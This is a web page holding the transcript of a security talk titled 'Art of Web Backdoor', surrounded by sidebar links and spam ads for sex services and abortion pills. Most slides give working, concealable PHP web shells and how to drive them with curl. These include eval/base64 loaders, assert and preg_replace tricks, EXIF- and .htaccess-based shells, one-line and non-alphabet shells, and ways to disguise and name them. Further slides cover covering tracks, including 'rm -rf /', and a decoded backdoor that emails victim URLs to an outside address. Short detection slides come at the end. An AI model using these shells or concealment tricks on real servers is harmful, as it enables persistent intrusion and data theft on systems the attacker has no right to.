 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
 
Server hardening
Server hardeningServer hardening
Server hardening
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hoster
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
PHP from the point of view of a webhoster
PHP from the point of view of a webhosterPHP from the point of view of a webhoster
PHP from the point of view of a webhoster
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
 
Php Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick RethansPhp Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick Rethans
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Badge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps JourneyBadge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps Journey
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 

More from Pichaya Morimoto

ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...Pichaya Morimoto
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationPichaya Morimoto
 
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsMysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsPichaya Morimoto
 
Web Hacking with Object Deserialization
Web Hacking with Object DeserializationWeb Hacking with Object Deserialization
Web Hacking with Object DeserializationPichaya Morimoto
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration TestingPichaya Morimoto
 
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Pichaya Morimoto
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPichaya Morimoto
 

More from Pichaya Morimoto (7)

ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
 
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsMysterious Crypto in Android Biometrics
Mysterious Crypto in Android Biometrics
 
Web Hacking with Object Deserialization
Web Hacking with Object DeserializationWeb Hacking with Object Deserialization
Web Hacking with Object Deserialization
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration Testing
 
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research Laboratory
 

Recently uploaded

The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 

Recently uploaded (20)

The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 

Art of Web Backdoor - Pichaya Morimoto

  • 1. Art of Web Backdoor stealth ways to hide your ass in pwned box pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
  • 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
  • 3. Overview ★ Anatomy of (PHP) Web Hacking ★ Maintaining Access ★ Techniques ★ Covering Tracks ★ Case Studies ★ Detect / Clean up
  • 4. How we put web backdoor? High Risk Medium Risk Low Risk OWASP Top Ten 2013 A1-Injection A2-Broken Authentication and Session Management A3-Cross-Site Scripting (XSS) A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 5. Public CMS/Plugins PWN 1. Vulnerability Assessment and Mapping ★ Vulnerable version ? Vulnerability exists ? ★ Conditions match ? / Known limitations 2. Exploitation ★ Public exploit available? 2.1 Yes - Just use it ★ Review & test 2.2 No - Source code analysis ★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/ ★ Issue tracker (SVN/GIT repo.) ★ Public / private vulnerability discussion 3. Zero-Day - for l33t h4x0r! ★ Source code analysis without patch, valuable!
  • 6. Joomla! - Unauthorised Uploads Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 Fixed Date: 2013-July-31 (2.5.14, 3.1.5) Vulnerable files 1. libraries/joomla/filesystem/file. php 2. administrator/components/com_m edia/helpers/media.php Scenario 1. Joomla! <= 2.5.13 2. User with author privilege 3. OS = Windows Machine or misconfigured Apache + Linux Bypassing File Upload Restrictions in Joomla!
  • 7. Known Issues or Limitations
  • 8. Backdoor is a Feature for Admin!
  • 9. Also in IPB, SMF, vBulletin
  • 10. Latest vBulletin 5.0.4 - PHP Module
  • 11. Case Study - Official Ubuntu Forums http://www.ubuntuforums.org/ ★ Hacked on 14 July 2013, Defaced on 20 July 2013 ★ 1.82 million users’ data leaked ★ Attacker had full access on Forums app servers ★ Servers running latest version of vBulletin What happened (posted in Canonical Blog) ● A moderator account was hacked ● Attacker post XSS to forum and sent to admin ● 31 seconds .. admin account was PWNED
  • 12. IPB - Bad Sanitization Invision Power Board <= 3.4.4 Released on : 2013/05/13 by @johnjean Logical Vulnerability + Bad Sanitization 1. Create new user using .. admin@email.com+[150 spaces]+A 2. MySQL Limitation! string exceeding 150 characters are truncated and value will be trim to cause arbitrary user have same email as admin and change admin pass!
  • 13. Other factors 3rd party components ★ uploadify, ckeditor, ckfinder, tinymce, openx Shared Hosting Security ★ Exposed Session Data ★ Improper user privileges (OS/Code execution, critical file manipulation) ★ Vulnerable services (SSH, FTP etc.) MITM, Insider attack, lack of physical access control etc.
  • 14. Maintaining Access Add arbitrary accounts (*nix shadow, AD etc.) Reverse Shell and/or Bind Shell using ... ★ Binary/Script Backdoor 1. Bind Port to *nix shell 2. Send *nix shell back to attacker 3. Make a relay tunnel 4. Hidden trigger to spawn shell ★ Web Backdoor - Use less privileged! Connect via HTTP Methods & Headers (GET/POST etc.)
  • 15. Simple PHP Backdoor <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die(); } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd $ curl -d “cat+/etc/passwd” http://target.com/simple-backdoor.php
  • 17. Passing variables to PHP global vars: $_GET $_POST $_COOKIE $_REQUEST $_SERVER [‘HTTP_CMD’] Communication $ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system ('uname -a;ps -aux');"
  • 18. base64_decode() + gzinflate() 1. Encode (Attacker Client) $ php -r "echo base64_encode(gzdeflate('system("id")'));" K64sLknN1VDKTFHSBAA= 2. Send (Attacker Client) $ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA=" 3. Decode (PHP Backdoor) @eval(gzinflate(base64_decode($_POST[“cmd”]))); 4. Output uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • 19. Code Evaluation besides eval() 1. assert() assert('sys' . 'tem('.$_POST["cmd"].')'); $ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'" 2. preg_replace() with -e modifier (deprecated in PHP 5.5.0) preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' ); $ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp" 3. And many more, e.g. OS command executions , check out this link! http://stackoverflow.com/questions/3115559/exploitable-php-functions
  • 20. Stupid trick! but it’s work! ★ GNU license in beginning of a PHP file! /* Copyright (C) 1991 Free Software Foundation, Inc. This file is part of the GNU C Library. … */ <?php ... ★ PGP Public Key !? /* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.10 (GNU/Linux) ... */ <?php … ★ Software license PROHIBIT to decode ★ More creative filename! ○ lndex.php ○ 1ndex.php ○ index2.php ○ wp-manual.php ○ cat.jpg.php ○ license.txt ○ README.md ○ .bash_profile
  • 21. PHP: exif_read_data() 1. Create exif meta-data using exiftool $ exiftool 2600.jpg -Software=system $ exiftool 2600.jpg -Model=id 2. Put 2600.jpg along with backdoor $A = exif_read_data('2600.jpg'); $A['Software']($A['Model']); 3. Browse to backdoor and boom! uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • 22. .htaccess + any file format 1. Apache Configuration AllowOverride All 2. .htaccess <FilesMatch "2600.jpg"> SetHandler application/x-httpd-php </FilesMatch> 3. 2600.jpg <?php @system($_POST["cmd"]); ?>
  • 23. one statement PHP backdoor <?@$_POST[0]($_POST[1])?> $ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
  • 24. Binary Code in PHP Shell
  • 25. Binary Code in PHP Shell
  • 26. non-alphabet PHP shell <?$_="";$_[+""]='';$_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?> <?=${'_'.$_}['_'](${'_'.$_}['__']);?> $ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a" *** This code contains non-printable characters, it might not work if you copy & paste! ***
  • 27. Common survivor feature! work for various type of OS (win/linux/osx ) and ISO ?? find writable directory read/write file merge into every files merge into backup db / files / zip reverse/bind php shell database client File management (symlink?) av/ids/ips/waf detect credential dumper os command network scanner TCP/UDP/HTTP/DNS Amp flood SOCKS Proxy for pivoting HTTP proxy, IRC connect back etc.
  • 29. Free Kiddies Backdoor! c99 r57 wso icfdkshell weevely ASPsh msfpayload use at your own risk! Caution! There are many cases that backdoor served inside another backdoor *w*)a e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1. zip $x10="x6dai154";$x0b=$_SERVER ["x53x45RVE122_x4eAMx45"].$_SERVER ["123103x52Ix50x54_116101115E"];$x0c=" 141r162a171040".$x0b;$x0d=array("143x61","x6cx69"," 146x77162151x74x65","100","vx65x2e");$x0e=$x0d[2].$x0d [3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b); Decoded: mail(“fwrite@live.ca”,”target/backdoor.php”,”target/backdoor.php”);
  • 30. Covering Tracks ★ root? ★ logs e.g. /var/log/* ★ history e.g. ~/.bash_history ★ self-destruction ★ rm -rf /
  • 31. Detect / Prevent ★ Follow secure coding guideline ★ Security hardening checklists ★ Critical File Integrity Monitoring ★ VA / Pentest by certified guys ★ Patch Management & Patch Auditing ★ Centralized Log & WAF? $ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
  • 32. MOD_Security ? var_dump(in_array('mod_security2', apache_get_modules ())); print_r(apache_get_modules());
  • 33. Clean up 1. Change/reset passwords 2. Review log files 3. Hunting vulnerable apps/backdoors 4. Backup || Recovery $ grep - common danger functions $ find ★ newly created files ★ certain conditions (time/date/permission)
  • 34. Practical Hacking? Capture The Flag https://ctftime.org/ Online challenges http://www.root-me.org/en/Challenges/ http://wargame2k10.nuitduhack.com/ http://captf.com/practice-ctf/ http://www.overthewire.org/wargames/natas/ http://www.modsecurity.org/demo/ VM Labs http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html https://pentesterlab.com/exercises/ http://vulnhub.com/ Thanks You !